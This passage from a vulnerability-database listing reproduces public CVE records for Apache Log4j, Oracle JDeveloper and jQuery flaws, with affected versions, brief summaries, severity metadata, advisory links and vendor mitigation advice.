Recursion", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2022-07-25T16:41:57", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { tags: [ "x_refsource_MISC", ], url: "https://logging.apache.org/log4j/2.x/security.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { name: "VU#930724", tags: [ "third-party-advisory", "x_refsource_CERT-VN", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", tags: [ "vendor-advisory", "x_refsource_CISCO", ], url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { name: "[oss-security] 20211218 CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { name: "DSA-5024", tags: [ "vendor-advisory", "x_refsource_DEBIAN", ], url: "https://www.debian.org/security/2021/dsa-5024", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { tags: [ "x_refsource_MISC", ], url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], source: { defect: [ "LOG4J2-3230", ], discovery: "UNKNOWN", }, title: "Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", workarounds: [ { lang: "en", value: "Implement one of the following mitigation techniques:\n\n* Java 8 (or later) users should upgrade to release 2.17.0.\n\nAlternatively, this can be mitigated in configuration:\n\n* In PatternLayout in the logging configuration, replace Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` with Thread Context Map patterns (%X, %mdc, or %MDC).\n* Otherwise, in the configuration, remove references to Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` where they originate \nfrom sources external to the application such as HTTP headers or user input.", }, ], x_generator: { engine: "Vulnogram 0.0.9", }, x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2021-45105", STATE: "PUBLIC", TITLE: "Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j2", version: { version_data: [ { version_affected: "<", version_name: "log4j-core", version_value: "2.17.0", }, { version_affected: ">=", version_name: "log4j-core", version_value: "2.13.0", }, { version_affected: "<", version_name: "log4j-core", version_value: "2.12.3", }, { version_affected: ">=", version_name: "log4j-core", version_value: "2.4", }, { version_affected: "<", version_name: "log4j-core", version_value: "2.3.1", }, { version_affected: ">=", version_name: "log4j-core", version_value: "2.0-alpha1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, credit: [ { lang: "eng", value: "Independently discovered by Hideki Okamoto of Akamai Technologies, Guy Lederfein of Trend Micro Research working with Trend Micro’s Zero Day Initiative, and another anonymous vulnerability researcher", }, ], data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.", }, ], }, generator: { engine: "Vulnogram 0.0.9", }, impact: [ { other: "high", }, ], problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CWE-20 Improper Input Validation", }, ], }, { description: [ { lang: "eng", value: "CWE-674: Uncontrolled Recursion", }, ], }, ], }, references: { reference_data: [ { name: "https://logging.apache.org/log4j/2.x/security.html", refsource: "MISC", url: "https://logging.apache.org/log4j/2.x/security.html", }, { name: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", refsource: "CONFIRM", url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032", }, { name: "VU#930724", refsource: "CERT-VN", url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "20211210 Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021", refsource: "CISCO", url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd", }, { name: "[oss-security] 20211218 CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2021/12/19/1", }, { name: "DSA-5024", refsource: "DEBIAN", url: "https://www.debian.org/security/2021/dsa-5024", }, { name: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", refsource: "CONFIRM", url: "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf", }, { name: "https://security.netapp.com/advisory/ntap-20211218-0001/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20211218-0001/", }, { name: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", refsource: "MISC", url: "https://www.zerodayinitiative.com/advisories/ZDI-21-1541/", }, { name: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", refsource: "CONFIRM", url: "https://cert-portal.siemens.com/productcert/pdf/ssa-501673.pdf", }, { name: "https://www.oracle.com/security-alerts/cpujan2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { name: "https://www.oracle.com/security-alerts/cpuapr2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], }, source: { defect: [ "LOG4J2-3230", ], discovery: "UNKNOWN", }, work_around: [ { lang: "en", value: "Implement one of the following mitigation techniques:\n\n* Java 8 (or later) users should upgrade to release 2.17.0.\n\nAlternatively, this can be mitigated in configuration:\n\n* In PatternLayout in the logging configuration, replace Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` with Thread Context Map patterns (%X, %mdc, or %MDC).\n* Otherwise, in the configuration, remove references to Context Lookups like `${ctx:loginId}` or `$${ctx:loginId}` where they originate \nfrom sources external to the application such as HTTP headers or user input.", }, ], }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2021-45105", datePublished: "2021-12-18T11:55:08", dateReserved: "2021-12-16T00:00:00", dateUpdated: "2024-08-04T04:39:20.295Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2017-3255
Vulnerability from cvelistv5
Published
2017-01-27 22:01
Modified
2024-10-09 19:41
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1037631 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/95543 | vdb-entry, x_refsource_BID | |
| http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html | x_refsource_CONFIRM |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle | JDeveloper |
Version: 11.1.1.7.0 Version: 11.1.1.9.0 Version: 11.1.2.4.0 Version: 12.1.3.0.0 Version: 12.2.1.0.0 Version: 12.2.1.1.0 Version: 12.2.1.2.0 |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-05T14:23:33.190Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { name: "1037631", tags: [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred", ], url: "http://www.securitytracker.com/id/1037631", }, { name: "95543", tags: [ "vdb-entry", "x_refsource_BID", "x_transferred", ], url: "http://www.securityfocus.com/bid/95543", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, ], title: "CVE Program Container", }, { metrics: [ { other: { content: { id: "CVE-2017-3255", options: [ { Exploitation: "none", }, { Automatable: "yes", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-10-09T19:25:28.650509Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2024-10-09T19:41:09.804Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "JDeveloper", vendor: "Oracle", versions: [ { status: "affected", version: "11.1.1.7.0", }, { status: "affected", version: "11.1.1.9.0", }, { status: "affected", version: "11.1.2.4.0", }, { status: "affected", version: "12.1.3.0.0", }, { status: "affected", version: "12.2.1.0.0", }, { status: "affected", version: "12.2.1.1.0", }, { status: "affected", version: "12.2.1.2.0", }, ], }, ], datePublic: "2017-01-17T00:00:00", descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).", }, ], problemTypes: [ { descriptions: [ { description: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-07-25T09:57:01", orgId: "43595867-4340-4103-b7a2-9a5208d29a85", shortName: "oracle", }, references: [ { name: "1037631", tags: [ "vdb-entry", "x_refsource_SECTRACK", ], url: "http://www.securitytracker.com/id/1037631", }, { name: "95543", tags: [ "vdb-entry", "x_refsource_BID", ], url: "http://www.securityfocus.com/bid/95543", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "secalert_us@oracle.com", ID: "CVE-2017-3255", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "JDeveloper", version: { version_data: [ { version_value: "11.1.1.7.0", }, { version_value: "11.1.1.9.0", }, { version_value: "11.1.2.4.0", }, { version_value: "12.1.3.0.0", }, { version_value: "12.2.1.0.0", }, { version_value: "12.2.1.1.0", }, { version_value: "12.2.1.2.0", }, ], }, }, ], }, vendor_name: "Oracle", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: ADF Faces). Supported versions that are affected are 11.1.1.7.0, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. While the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper accessible data. CVSS v3.0 Base Score 5.8 (Confidentiality impacts).", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", }, ], }, ], }, references: { reference_data: [ { name: "1037631", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1037631", }, { name: "95543", refsource: "BID", url: "http://www.securityfocus.com/bid/95543", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "43595867-4340-4103-b7a2-9a5208d29a85", assignerShortName: "oracle", cveId: "CVE-2017-3255", datePublished: "2017-01-27T22:01:00", dateReserved: "2016-12-06T00:00:00", dateUpdated: "2024-10-09T19:41:09.804Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2005-2292
Vulnerability from cvelistv5
Published
2005-07-17 04:00
Modified
2024-08-07 22:22
Severity ?
EPSS score ?
Summary
Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html | x_refsource_MISC | |
| http://secunia.com/advisories/15991/ | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/21342 | vdb-entry, x_refsource_XF | |
| http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html | x_refsource_CONFIRM | |
| http://marc.info/?l=bugtraq&m=112129177927502&w=2 | mailing-list, x_refsource_BUGTRAQ |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-07T22:22:48.614Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_refsource_MISC", "x_transferred", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { name: "15991", tags: [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred", ], url: "http://secunia.com/advisories/15991/", }, { name: "jdeveloper-config-plaintext-password(21342)", tags: [ "vdb-entry", "x_refsource_XF", "x_transferred", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { tags: [ "x_refsource_CONFIRM", "x_transferred", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { name: "20050713 Advisory: Oracle JDeveloper Plaintext Passwords", tags: [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred", ], url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "n/a", vendor: "n/a", versions: [ { status: "affected", version: "n/a", }, ], }, ], datePublic: "2005-07-13T00:00:00", descriptions: [ { lang: "en", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.", }, ], problemTypes: [ { descriptions: [ { description: "n/a", lang: "en", type: "text", }, ], }, ], providerMetadata: { dateUpdated: "2017-07-10T14:57:01", orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", shortName: "mitre", }, references: [ { tags: [ "x_refsource_MISC", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { name: "15991", tags: [ "third-party-advisory", "x_refsource_SECUNIA", ], url: "http://secunia.com/advisories/15991/", }, { name: "jdeveloper-config-plaintext-password(21342)", tags: [ "vdb-entry", "x_refsource_XF", ], url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { name: "20050713 Advisory: Oracle JDeveloper Plaintext Passwords", tags: [ "mailing-list", "x_refsource_BUGTRAQ", ], url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "cve@mitre.org", ID: "CVE-2005-2292", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "n/a", version: { version_data: [ { version_value: "n/a", }, ], }, }, ], }, vendor_name: "n/a", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "Oracle JDeveloper 9.0.4, 9.0.5, and 10.1.2 stores cleartext passwords in (1) IDEConnections.xml, (2) XSQLConfig.xml and (3) settings.xml, which allows local users to obtain sensitive information.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "n/a", }, ], }, ], }, references: { reference_data: [ { name: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", refsource: "MISC", url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_plaintext_password.html", }, { name: "15991", refsource: "SECUNIA", url: "http://secunia.com/advisories/15991/", }, { name: "jdeveloper-config-plaintext-password(21342)", refsource: "XF", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/21342", }, { name: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", refsource: "CONFIRM", url: "http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html", }, { name: "20050713 Advisory: Oracle JDeveloper Plaintext Passwords", refsource: "BUGTRAQ", url: "http://marc.info/?l=bugtraq&m=112129177927502&w=2", }, ], }, }, }, }, cveMetadata: { assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca", assignerShortName: "mitre", cveId: "CVE-2005-2292", datePublished: "2005-07-17T04:00:00", dateReserved: "2005-07-17T00:00:00", dateUpdated: "2024-08-07T22:22:48.614Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2021-4104
Vulnerability from cvelistv5
Published
2021-12-14 00:00
Modified
2024-08-03 17:16
Severity ?
EPSS score ?
Summary
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache Log4j 1.x |
Version: Apache Log4j 1.2 1.2.x |
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-03T17:16:04.172Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { tags: [ "x_transferred", ], url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { tags: [ "x_transferred", ], url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { name: "VU#930724", tags: [ "third-party-advisory", "x_transferred", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { tags: [ "x_transferred", ], url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { tags: [ "x_transferred", ], url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { tags: [ "x_transferred", ], url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "GLSA-202209-02", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202209-02", }, { name: "GLSA-202310-16", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202310-16", }, { name: "GLSA-202312-02", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202312-02", }, { name: "GLSA-202312-04", tags: [ "vendor-advisory", "x_transferred", ], url: "https://security.gentoo.org/glsa/202312-04", }, ], title: "CVE Program Container", }, ], cna: { affected: [ { product: "Apache Log4j 1.x", vendor: "Apache Software Foundation", versions: [ { status: "affected", version: "Apache Log4j 1.2 1.2.x", }, ], }, ], descriptions: [ { lang: "en", value: "JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.", }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-502", description: "CWE-502 Deserialization of Untrusted Data", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2023-12-22T09:06:15.357899", orgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", shortName: "apache", }, references: [ { url: "https://www.cve.org/CVERecord?id=CVE-2021-44228", }, { url: "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126", }, { url: "https://access.redhat.com/security/cve/CVE-2021-4104", }, { name: "VU#930724", tags: [ "third-party-advisory", ], url: "https://www.kb.cert.org/vuls/id/930724", }, { name: "[oss-security] 20220118 CVE-2022-23302: Deserialization of untrusted data in JMSSink in Apache Log4j 1.x", tags: [ "mailing-list", ], url: "http://www.openwall.com/lists/oss-security/2022/01/18/3", }, { url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { url: "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0033", }, { url: "https://security.netapp.com/advisory/ntap-20211223-0007/", }, { url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { name: "GLSA-202209-02", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202209-02", }, { name: "GLSA-202310-16", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202310-16", }, { name: "GLSA-202312-02", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202312-02", }, { name: "GLSA-202312-04", tags: [ "vendor-advisory", ], url: "https://security.gentoo.org/glsa/202312-04", }, ], source: { discovery: "UNKNOWN", }, title: "Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2", x_generator: { engine: "Vulnogram 0.0.9", }, }, }, cveMetadata: { assignerOrgId: "f0158376-9dc2-43b6-827c-5f631a4d8d09", assignerShortName: "apache", cveId: "CVE-2021-4104", datePublished: "2021-12-14T00:00:00", dateReserved: "2021-12-13T00:00:00", dateUpdated: "2024-08-03T17:16:04.172Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", }
cve-2019-11358
Vulnerability from cvelistv5
Published
2019-04-19 00:00
Modified
2024-11-15 15:11
Severity ?
EPSS score ?
Summary
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
References
{ containers: { adp: [ { providerMetadata: { dateUpdated: "2024-08-04T22:48:09.199Z", orgId: "af854a3a-2127-422b-91ae-364da2661108", shortName: "CVE", }, references: [ { tags: [ "x_transferred", ], url: "https://www.drupal.org/sa-core-2019-006", }, { tags: [ "x_transferred", ], url: "https://www.synology.com/security/advisory/Synology_SA_19_19", }, { name: "DSA-4434", tags: [ "vendor-advisory", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { name: "20190421 [SECURITY] [DSA 4434-1] drupal7 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { name: "108023", tags: [ "vdb-entry", "x_transferred", ], url: "http://www.securityfocus.com/bid/108023", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] feng-tao opened a new pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] codecov-io commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG merged pull request #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { name: "[airflow-commits] 20190428 [GitHub] [airflow] XD-DENG commented on issue #5197: [AIRFLOW-XXX] Fix CVE-2019-11358", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { name: "[debian-lts-announce] 20190506 [SECURITY] [DLA 1777-1] jquery security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { name: "FEDORA-2019-eba8e44ee6", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { name: "FEDORA-2019-1a3edd7e8a", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { name: "FEDORA-2019-7eaf0bbe7c", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { name: "FEDORA-2019-2a0ce0c58c", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { name: "FEDORA-2019-a06dffab1c", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { name: "FEDORA-2019-f563e66380", tags: [ "vendor-advisory", "x_transferred", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { name: "20190509 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { name: "20190510 dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { name: "20190510 dotCMS v5.1.1 Vulnerabilities", tags: [ "mailing-list", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { name: "20190510 Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability", tags: [ "mailing-list", "x_transferred", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { name: "[debian-lts-announce] 20190520 [SECURITY] [DLA 1797-1] drupal7 security update", tags: [ "mailing-list", "x_transferred", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { name: "[oss-security] 20190603 Django: CVE-2019-12308 AdminURLFieldWidget XSS (plus patched bundled jQuery for CVE-2019-11358)", tags: [ "mailing-list", "x_transferred", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { tags: [ "x_transferred", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { name: "RHSA-2019:1456", tags: [ "vendor-advisory", "x_transferred", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { name: "DSA-4460", tags: [ "vendor-advisory", "x_transferred", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { name: "20190612 [SECURITY] [DSA 4460-1] mediawiki security update", tags: [ "mailing-list", "x_transferred", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { name: "openSUSE-SU-2019:1839", tags: [ "vendor-advisory", "x_transferred", ], url: 